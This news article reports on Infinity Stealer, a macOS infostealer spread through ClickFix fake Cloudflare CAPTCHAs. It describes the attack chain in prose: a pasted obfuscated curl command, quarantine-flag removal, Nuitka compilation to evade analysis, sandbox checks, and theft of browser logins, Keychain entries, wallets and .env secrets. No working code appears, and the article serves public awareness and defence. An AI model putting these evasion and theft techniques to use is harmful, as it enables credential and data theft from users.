ClickFix: The New Threat to macOS Security

A sophisticated info-stealing malware known as Infinity Stealer is now targeting macOS operating systems, utilizing a Python payload that is disguised as an executable file through the Nuitka compiler, an open-source tool.

This malicious attack employs the ClickFix method, where a deceptive fake CAPTCHA resembling Cloudflare’s human verification process is presented to deceive unsuspecting users into executing harmful code.

According to researchers at Malwarebytes, this marks the first reported macOS campaign that combines ClickFix delivery with a Python-infostealer compiled using Nuitka.

The use of Nuitka to compile the Python script into C code results in a native binary executable that is more resilient to static analysis.

Compared to PyInstaller, which combines Python with bytecode, Nuitka’s approach is more evasive as it generates a genuine native binary without an obvious bytecode layer, making it significantly more challenging for reverse engineering.

“The final payload is coded in Python and compiled with Nuitka, creating a native macOS binary that enhances its resistance to analysis and detection compared to traditional Python-based malware,” stated Malwarebytes.

Understanding the Attack Chain

The attack commences with a ClickFix lure on the domain update-check[.]com, masquerading as a Cloudflare human verification process, prompting users to complete a challenge by pasting a base64-obfuscated curl command into the macOS Terminal, circumventing built-in OS defenses.

The decoded Bash script from the command writes the stage-2 (Nuitka loader) to /tmp, eliminates the quarantine flag, and executes it using ‘nohup.’ Subsequently, it configures the command-and-control (C2) and token through environment variables, self-deletes, and closes the Terminal window.

The Nuitka loader is an 8.6 MB Mach-O binary housing a 35MB zstd-compressed archive containing the stage-3 (UpdateHelper.bin), which is the Infinity Stealer malware.

See also  Latest iOS Update: New Emoji, Enhanced Security, and More Features

Prior to data harvesting, the malware conducts anti-analysis checks to determine if it is operating within a virtualized or sandboxed environment.

Analysis by Malwarebytes revealed that the Python 3.11 payload of the info-stealer can capture screenshots and extract various sensitive data, including:

• User credentials from Chromium-based browsers and Firefox
• Entries from macOS Keychain
• Cryptocurrency wallet information
• Plaintext secrets found in developer files like .env

All pilfered data is sent to the command-and-control server via HTTP POST requests, with threat actors receiving a Telegram notification upon completion of the data exfiltration process.

Malwarebytes emphasizes that the emergence of threats like Infinity Stealer underscores the escalating sophistication and targeting of macOS-specific malware.

It is crucial for users to refrain from executing Terminal commands sourced online that are not fully comprehended.